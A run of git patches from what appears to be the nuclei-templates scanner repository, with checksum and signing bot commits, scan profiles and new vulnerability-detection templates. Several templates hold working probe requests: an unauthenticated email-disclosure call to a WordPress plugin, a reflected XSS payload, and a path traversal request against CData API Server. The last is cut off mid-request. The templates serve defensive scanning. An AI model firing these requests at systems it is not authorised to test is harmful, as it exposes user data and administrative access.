+0000 Subject: [PATCH 0387/1768] Auto Generated New Template Addition List [Fri Apr 26 08:59:57 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 5b6e3f02e6..e7b43099c7 100644 --- a/.new-additions +++ b/.new-additions @@ -18,3 +18,5 @@ http/exposed-panels/tixeo-panel.yaml http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/titannit-web-exposure.yaml http/vulnerabilities/titan/titannit-web-ssrf.yaml +network/detection/aix-websm-detect.yaml +network/detection/bluecoat-telnet-proxy-detect.yaml From bcb2b69b291c69f700ebf7b175be1fa66f27c337 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 09:00:06 +0000 Subject: [PATCH 0388/1768] Auto Generated Templates Checksum [Fri Apr 26 09:00:06 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1ab3f73b34..3a0801e239 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2921,7 +2921,7 @@ http/cves/2023/CVE-2023-2130.yaml:3112dc19046f9cd9a37c8248f8dd4993a2785ea3 http/cves/2023/CVE-2023-2178.yaml:1c0e5bdc28786bbf38e0dab3801f5ed0f7d57d80 http/cves/2023/CVE-2023-22232.yaml:7a054b7c8eb7e2a0e5ea214bddba72a25b1812d6 http/cves/2023/CVE-2023-2224.yaml:52adda04d740bd4bfdce198531080707a6914193 -http/cves/2023/CVE-2023-2227.yaml:ba7c9dba9df328c0200959c7c76ce91cc143fa9e +http/cves/2023/CVE-2023-2227.yaml:54472ac0d1a72b07f2b8a497807a39cc85882372 http/cves/2023/CVE-2023-22432.yaml:d50bb3793ea5aa8783f5fb80f2f8b341f44818b5 http/cves/2023/CVE-2023-22463.yaml:211e5de7967e175e73daf8d08a733140f2488fed http/cves/2023/CVE-2023-22478.yaml:a65b40c02a4506378bee485814f98c19b9ac1aa0 @@ -8305,6 +8305,7 @@ network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529 network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef network/detection/bgp-detect.yaml:53fc7559679a89a8db2bfb0b44c771fff916d006 +network/detection/bluecoat-telnet-proxy-detect.yaml:185c1a74bbabeddd70d88e5cfb724f2013b83266 network/detection/cisco-finger-detect.yaml:12c8c9b4e0504539a5280517e2a0a0039cd9f588 network/detection/clamav-detect.yaml:34ee606515af2f8ab375ce4f602ca5942f8b20a3 network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb1e4c @@ -8451,7 +8452,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:156a6e15576d7cb50a4acef7eab8e73b11832c62 +templates-checksum.txt:8c981230397fad8e5b5f13c6ef200c57e2c14d10 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3d23f3f112c97d2f5c7b752e0d2d808544b2ab83 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 26 Apr 2024 09:00:44 +0000 Subject: [PATCH 0390/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b2f4820068..317ce76e92 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,8 @@ on: - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' - 'http/vulnerabilities/titan/titannit-web-ssrf.yaml' + - 'network/detection/aix-websm-detect.yaml' + - 'network/detection/bluecoat-telnet-proxy-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 606f6203779569e5e7c193d0128625e132b18767 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 09:01:39 +0000 Subject: [PATCH 0391/1768] Auto Generated Templates Checksum [Fri Apr 26 09:01:39 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3a0801e239..92f3261abb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8301,6 +8301,7 @@ network/default-login/ftp-anonymous-login.yaml:0eb4d44490e80c5f5f8e7e9e7ecb1fa0c network/default-login/ftp-weak-credentials.yaml:c0cf4a3227435e117de922b08ad77edebf6304a5 network/default-login/ldap-anonymous-login.yaml:1d0d2f3485fec11106c15b75166448f9ab047eec network/detection/activemq-openwire-transport-detect.yaml:da59945499ac1f46d9ac606f27d98dd8e1e493d9 +network/detection/aix-websm-detect.yaml:5f48d15d92ca7cffa357f5b16f8c5953e46566fe network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529be8b5e network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef @@ -8452,7 +8453,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8c981230397fad8e5b5f13c6ef200c57e2c14d10 +templates-checksum.txt:9d79c67946e288b53ddab7dd291b828f74898fc6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 450271634369e4f741e1da0d3892d0bee936a7e1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Apr 2024 09:01:49 +0000 Subject: [PATCH 0392/1768] Auto Template Signing [Fri Apr 26 09:01:49 UTC 2024] :robot: --- network/detection/bluecoat-telnet-proxy-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/bluecoat-telnet-proxy-detect.yaml b/network/detection/bluecoat-telnet-proxy-detect.yaml index 1c9fbfb131..f8947f2e7c 100644 --- a/network/detection/bluecoat-telnet-proxy-detect.yaml +++ b/network/detection/bluecoat-telnet-proxy-detect.yaml @@ -30,3 +30,4 @@ tcp: part: data words: - "Blue Coat telnet proxy" +# digest: 490a004630440220399eadb0d76d49e997e4ee4a1b74d4febf52005a6ee99ce0a4ebe1722015fada02205db8a40c7ad217a83d8a7689da6dd13aeee373f9430b725c7cfa7adf2dc2f09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 48c2afa48ec9329e5e9164b3e452b0389ceeae8b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= <krzysztof.zajac2@gmail.com> Date: Fri, 26 Apr 2024 13:22:50 +0200 Subject: [PATCH 0393/1768] Mixed-active-content: fewer FPs --- http/misconfiguration/mixed-active-content.yaml | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index a07bdd3186..c53576e979 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -24,6 +24,18 @@ http: max-redirects: 3 matchers-condition: and matchers: + - type: regex + part: body + negative: true + regex: + # There are some sites which download scripts using an unencrypted connection (e.g. http://html5shiv.googlecode.com/svn/trunk/html5.js) + # to the users of old browsers. + # + # This rule filters such sites (even if the site contains other scripts downloaded using an unencrypted connection) to decrease the number + # of false positives. If you have an idea how to filter out only such scripts (and detect if the same site serves another script using + # http:// to all users) feel free to replace the rule. + - "(?mi)<!--\\[if lt IE [0-9]*\\]>\\s*<script src=\"http://" + - type: regex part: body regex: @@ -43,4 +55,4 @@ http: - "<script[^>]*src=['\"](http[^s'\">][^'\">]*)['\"]" - "<iframe[^>]*src=['\"](http[^s'\">][^'\">]*)['\"]" - "<object[^>]*data=['\"](http[^s'\">][^'\">]*)['\"]" -# digest: 490a0046304402206da84b39f7171acdcb806ade774850286919e63b2628ec34cc1e808c55a50bc4022018d956b267ea58eac95a3c718ccb8706453332cb853e89eb235cd7775c4cdfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206da84b39f7171acdcb806ade774850286919e63b2628ec34cc1e808c55a50bc4022018d956b267ea58eac95a3c718ccb8706453332cb853e89eb235cd7775c4cdfa5:922c64590222798bb761d5b6d8e72950 From 38a6fb57f36861ee08d53f92c862029b827b2cc7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= <krzysztof.zajac2@gmail.com> Date: Fri, 26 Apr 2024 13:49:36 +0200 Subject: [PATCH 0394/1768] , --- http/misconfiguration/mixed-active-content.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index c53576e979..0f36c83b53 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -28,13 +28,13 @@ http: part: body negative: true regex: - # There are some sites which download scripts using an unencrypted connection (e.g. http://html5shiv.googlecode.com/svn/trunk/html5.js) - # to the users of old browsers. - # - # This rule filters such sites (even if the site contains other scripts downloaded using an unencrypted connection) to decrease the number - # of false positives. If you have an idea how to filter out only such scripts (and detect if the same site serves another script using - # http:// to all users) feel free to replace the rule. - - "(?mi)<!--\\[if lt IE [0-9]*\\]>\\s*<script src=\"http://" + # There are some sites which download scripts using an unencrypted connection (e.g. http://html5shiv.googlecode.com/svn/trunk/html5.js) + # to the users of old browsers. + # + # This rule filters such sites (even if the site contains other scripts downloaded using an unencrypted connection) to decrease the number + # of false positives. If you have an idea how to filter out only such scripts (and detect if the same site serves another script using + # http:// to all users) feel free to replace the rule. + - "(?mi)<!--\\[if lt IE [0-9]*\\]>\\s*<script src=\"http://" - type: regex part: body From 9e5e693362a1443232169e128b182b6c8f508d52 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 27 Apr 2024 09:48:48 +0000 Subject: [PATCH 0396/1768] Auto Generated Templates Checksum [Sat Apr 27 09:48:48 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92f3261abb..5f13a9d250 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8280,7 +8280,7 @@ network/backdoor/backdoored-zte.yaml:42b5ec609229045d3ebbb6e8968a1797413afb44 network/c2/darkcomet-trojan.yaml:b8f71af056f9dfd77c24d37df301be7fba986838 network/c2/darktrack-rat-trojan.yaml:36425c7572204441890fd6ad0336762658fbe963 network/c2/orcus-rat-trojan.yaml:a4c141d7019f20768165f92ac5d4bfc08e8551d9 -network/c2/xtremerat-trojan.yaml:3c9e3faaaa303deb1903870db24ff88cf056c672 +network/c2/xtremerat-trojan.yaml:fa2fa746275c57dc51a7b0ca987f5b1c9783fc79 network/cves/2001/CVE-2001-1473.yaml:5374944a926a53026fd02e17333ab21c0fd94115 network/cves/2011/CVE-2011-2523.yaml:439f13ea18e52af5b7de1ae93ed2de579a3157c3 network/cves/2015/CVE-2015-3306.yaml:89bdabc177692a54c7c144c2c45446b15350f513 @@ -8306,7 +8306,7 @@ network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529 network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef network/detection/bgp-detect.yaml:53fc7559679a89a8db2bfb0b44c771fff916d006 -network/detection/bluecoat-telnet-proxy-detect.yaml:185c1a74bbabeddd70d88e5cfb724f2013b83266 +network/detection/bluecoat-telnet-proxy-detect.yaml:f7509936000eeac439add7b118ee52ac3c0f8725 network/detection/cisco-finger-detect.yaml:12c8c9b4e0504539a5280517e2a0a0039cd9f588 network/detection/clamav-detect.yaml:34ee606515af2f8ab375ce4f602ca5942f8b20a3 network/detection/cql-native-transport.yaml:8f848170731a7e132e745e9ce45824c9e2fb1e4c @@ -8453,7 +8453,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9d79c67946e288b53ddab7dd291b828f74898fc6 +templates-checksum.txt:5a4967397f87a5e4bf8b4968ee500d7882ef0f51 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c76300bb1dbad1f786cb51ecda4e8646334b6e46 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 27 Apr 2024 09:50:26 +0000 Subject: [PATCH 0397/1768] Auto Template Signing [Sat Apr 27 09:50:26 UTC 2024] :robot: --- network/c2/xtremerat-trojan.yaml | 2 +- network/detection/aix-websm-detect.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/network/c2/xtremerat-trojan.yaml b/network/c2/xtremerat-trojan.yaml index dc51d18180..2ea34e8eca 100644 --- a/network/c2/xtremerat-trojan.yaml +++ b/network/c2/xtremerat-trojan.yaml @@ -28,4 +28,4 @@ tcp: - type: regex regex: - "^X$" -# digest: 4a0a0047304502206fa95ec595a2933ca08a0326dbce0d411afd01de4b65c0c060b9d1317264e96e022100a648393498fd3a99b1aec95f74372fc476d2e484933f438b68468bc6efa642d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e69816e86c96597b53b68c265972455eb51b9f8b0a59250a6ee55cd0d37222c022100d7bedfe4486bf9d0275f38620dc70321d06c027224dbc726d96ac70a0441f402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/detection/aix-websm-detect.yaml b/network/detection/aix-websm-detect.yaml index 4f30cd7dc6..f2e5746791 100644 --- a/network/detection/aix-websm-detect.yaml +++ b/network/detection/aix-websm-detect.yaml @@ -32,3 +32,4 @@ tcp: - "/var/websm/" - "startNewWServer" condition: and +# digest: 4b0a00483046022100926d1c911a44917403cb63099e36aec7abae95fd57c77bd20368974ea6e92842022100963f49661741889efbed08aa78b3acede2bcc8310424c4463d432a3b874448c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 15a25c284739cbd29e1678c5bf18fe3f6e874566 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Sun, 28 Apr 2024 02:46:28 +0530 Subject: [PATCH 0398/1768] Add profiles --- profiles/{bugbounty.yml => all.yml} | 21 ++++----------------- profiles/cves.yml | 12 ++++++++++++ profiles/default-login.yml | 11 +++++++++++ profiles/exposedfiles.yml | 9 +++++++++ profiles/exposedpanels.yml | 9 +++++++++ profiles/kev.yml | 2 +- profiles/misconfigurations.yml | 11 +++++++++++ profiles/subdomaintakeovers.yml | 11 +++++++++++ 8 files changed, 68 insertions(+), 18 deletions(-) rename profiles/{bugbounty.yml => all.yml} (50%) create mode 100644 profiles/cves.yml create mode 100644 profiles/default-login.yml create mode 100644 profiles/exposedfiles.yml create mode 100644 profiles/exposedpanels.yml create mode 100644 profiles/misconfigurations.yml create mode 100644 profiles/subdomaintakeovers.yml diff --git a/profiles/bugbounty.yml b/profiles/all.yml similarity index 50% rename from profiles/bugbounty.yml rename to profiles/all.yml index 0b04440ca1..6d16f50a89 100644 --- a/profiles/bugbounty.yml +++ b/profiles/all.yml @@ -1,26 +1,13 @@ -# This is a configuration file for the bugbounty template profile. +# This is a configuration file for the all template profile. # Additional configuration profiles can be created for different types of nuclei scans. # They should be placed under the 'config' directory at: # https://github.com/projectdiscovery/nuclei-templates # Here is an example of how to use a config profile: -# nuclei -config config/bugbounty.yml -list target_list_to_scan.txt - -severity: - - critical - - high - - medium - - low - - unknown - +# nuclei -config config/osint.yml -list target_list_to_scan.txt type: - http - tcp - javascript + - dns + - ssl -exclude-tags: - - tech - - dos - - fuzz - - creds-stuffing - - token-spray - - osint \ No newline at end of file diff --git a/profiles/cves.yml b/profiles/cves.yml new file mode 100644 index 0000000000..265cf0ea45 --- /dev/null +++ b/profiles/cves.yml @@ -0,0 +1,12 @@ +# This is a configuration file for the cves template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'config' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a config profile: +# nuclei -config config/osint.yml -list target_list_to_scan.txt + +templates: + - http/cves/ + - http/cnvd/ + - network/cves/ + - javascript/cves/ diff --git a/profiles/default-login.yml b/profiles/default-login.yml new file mode 100644 index 0000000000..4350b23863 --- /dev/null +++ b/profiles/default-login.yml @@ -0,0 +1,11 @@ +# This is a configuration file for the default logins template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'config' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a config profile: +# nuclei -config config/osint.yml -list target_list_to_scan.txt + +templates: + - http/default-logins/ + - network/default-login/ + - javascript/default-logins/ \ No newline at end of file diff --git a/profiles/exposedfiles.yml b/profiles/exposedfiles.yml new file mode 100644 index 0000000000..968b20a8a6 --- /dev/null +++ b/profiles/exposedfiles.yml @@ -0,0 +1,9 @@ +# This is a configuration file for the exposed files template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'config' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a config profile: +# nuclei -config config/osint.yml -list target_list_to_scan.txt + +templates: + - http/exposures/ \ No newline at end of file diff --git a/profiles/exposedpanels.yml b/profiles/exposedpanels.yml new file mode 100644 index 0000000000..a3fffdc33e --- /dev/null +++ b/profiles/exposedpanels.yml @@ -0,0 +1,9 @@ +# This is a configuration file for the exposed panels template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'config' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a config profile: +# nuclei -config config/osint.yml -list target_list_to_scan.txt + +templates: + - http/exposed-panels/ \ No newline at end of file diff --git a/profiles/kev.yml b/profiles/kev.yml index be8ba21ca3..8c3d6f8ff9 100644 --- a/profiles/kev.yml +++ b/profiles/kev.yml @@ -1,4 +1,4 @@ -# This is a configuration file for the KEV template profile. +# This is a configuration file for the CISA KEV template profile. # Additional configuration profiles can be created for different types of nuclei scans. # They should be placed under the 'config' directory at: # https://github.com/projectdiscovery/nuclei-templates diff --git a/profiles/misconfigurations.yml b/profiles/misconfigurations.yml new file mode 100644 index 0000000000..d98bc8fa02 --- /dev/null +++ b/profiles/misconfigurations.yml @@ -0,0 +1,11 @@ +# This is a configuration file for the misconfigurations template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'config' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a config profile: +# nuclei -config config/osint.yml -list target_list_to_scan.txt + +templates: + - http/misconfiguration/ + - network/misconfig/ + - javascript/misconfiguration/ \ No newline at end of file diff --git a/profiles/subdomaintakeovers.yml b/profiles/subdomaintakeovers.yml new file mode 100644 index 0000000000..06d420b133 --- /dev/null +++ b/profiles/subdomaintakeovers.yml @@ -0,0 +1,11 @@ +# This is a configuration file for the subdomain takeover template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'config' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a config profile: +# nuclei -config config/osint.yml -list target_list_to_scan.txt + +templates: + - http/takeovers/ + - dns/azure-takeover-detection.yaml + - dns/elasticbeanstalk-takeover.yaml \ No newline at end of file From bd4ead957cedd48836253cba568e7f686e5dcf81 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 28 Apr 2024 11:34:28 +0530 Subject: [PATCH 0399/1768] Create CVE-2024-0235.yaml --- http/cves/2024/CVE-2024-0235.yaml | 45 +++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0235.yaml diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml new file mode 100644 index 0000000000..76933d8a98 --- /dev/null +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-0235 + +info: + name: EventON WordPress Plugin Unauthorized Email Access + author: princechaddha + severity: medium + description: The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog. + impact: | + An attacker could potentially access sensitive email information. + remediation: | + Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235. + reference: + - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/ + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-0235 + cwe-id: CWE-862 + epss-score: 0.00052 + epss-percentile: 0.19212 + cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* + metadata: + vendor: myeventon + product: eventon + framework: wordpress + shodan-query: vuln:CVE-2023-2796 + fofa-query: wp-content/plugins/eventon/ + tags: cve,cve2024,wp,wordpress,unauth,exposure + +http: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users" + + headers: + Content-Type: application/x-www-form-urlencoded + + body: "_user_role=administrator" + + matchers: + - type: word + words: + - "@" + part: body From a1a1b3f4cdaa27884864bc9f10093a43296c325e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 28 Apr 2024 14:47:42 +0530 Subject: [PATCH 0400/1768] update matcher --- http/cves/2024/CVE-2024-0235.yaml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 76933d8a98..cecd091f16 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -1,10 +1,11 @@ id: CVE-2024-0235 info: - name: EventON WordPress Plugin Unauthorized Email Access + name: EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Email Address Disclosure author: princechaddha severity: medium - description: The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog. + description: | + The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog. impact: | An attacker could potentially access sensitive email information. remediation: | @@ -18,7 +19,7 @@ info: cve-id: CVE-2024-0235 cwe-id: CWE-862 epss-score: 0.00052 - epss-percentile: 0.19212 + epss-percentile: 0.19233 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: vendor: myeventon @@ -26,7 +27,8 @@ info: framework: wordpress shodan-query: vuln:CVE-2023-2796 fofa-query: wp-content/plugins/eventon/ - tags: cve,cve2024,wp,wordpress,unauth,exposure + publicwww-query: "wp-content/plugins/eventon/" + tags: cve,cve2024,wp,wordpress,unauth,exposure,eventon,wpscan http: - method: POST @@ -38,8 +40,15 @@ http: body: "_user_role=administrator" + matchers-condition: and matchers: - type: word words: - - "@" + - '@' + - '"status":' + - '"content":' part: body + + - type: status + status: + - 200 From 9f0cb88f009d8f48ac739724f1fff5bc32ce3643 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 28 Apr 2024 14:54:02 +0530 Subject: [PATCH 0401/1768] condition and added --- http/cves/2024/CVE-2024-0235.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index cecd091f16..0f3fca8273 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -43,11 +43,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '@' - '"status":' - '"content":' - part: body + condition: and - type: status status: From 27b3f7ed9203f924521a8c6174a0529872bbeb9a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 28 Apr 2024 16:07:41 +0530 Subject: [PATCH 0402/1768] excluding fuzzing templates --- .github/workflows/template-db-indexer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index ca7a1da2e9..92305f055d 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -28,4 +28,4 @@ jobs: AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }} run: | - generate-index -mode templates + generate-index -mode templates -eft From 9cd8ac2cfa983e2dbf3b343555309cafec856f2e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 29 Apr 2024 08:04:48 +0530 Subject: [PATCH 0403/1768] Create CVE-2024-24131.yaml --- http/cves/2024/CVE-2024-24131.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-24131.yaml diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml new file mode 100644 index 0000000000..615e72c43e --- /dev/null +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-24131 + +info: + name: SuperWebMailer 9.31.0.01799 - Reflected Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: | + SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-24131 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-24131 + cwe-id: CWE-79 + epss-score: 0.00046 + epss-percentile: 0.15655 + cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.31.0.01799:*:*:*:*:*:*:* + metadata: + vendor: superwebmailer + product: superwebmailer + shodan-query: title:"SuperWebMailer" + tags: cve,cve2024,superwebmailer,xss + +http: + - method: GET + path: + - "{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<script>alert(document.domain)</script>" + - "SuperWebMailerAPI" + condition: and + + - type: status + status: + - 200 From ad3721f83d44ffc761dcd31d01d002c5eac5fab6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 29 Apr 2024 13:05:42 +0530 Subject: [PATCH 0404/1768] Create CVE-2024-31849.yaml --- http/cves/2024/CVE-2024-31849.yaml | 48 ++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 http/cves/2024/CVE-2024-31849.yaml diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml new file mode 100644 index 0000000000..b738778aa8 --- /dev/null +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -0,0 +1,48 @@ +id: CVE-2024-31849 + +info: + name: CData - Path Traversal + author: DhiyaneshDK + severity: critical + description: | + A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application. + reference: + - https://www.tenable.com/security/research/tra-2024-09 + - https://www.cdata.com/kb/entries/jetty-cve-0324.rst + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-31849 + cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.09652 + metadata: + shodan-query: title:"CData" + verified: true + max-request: 1 + tags: cve,cve2024,cdata,lfi + +http: + - raw: + - | + GET /ui/..\src\getSettings.rsb?@json HTTP/1.1 + Host: {{Hostname}} + 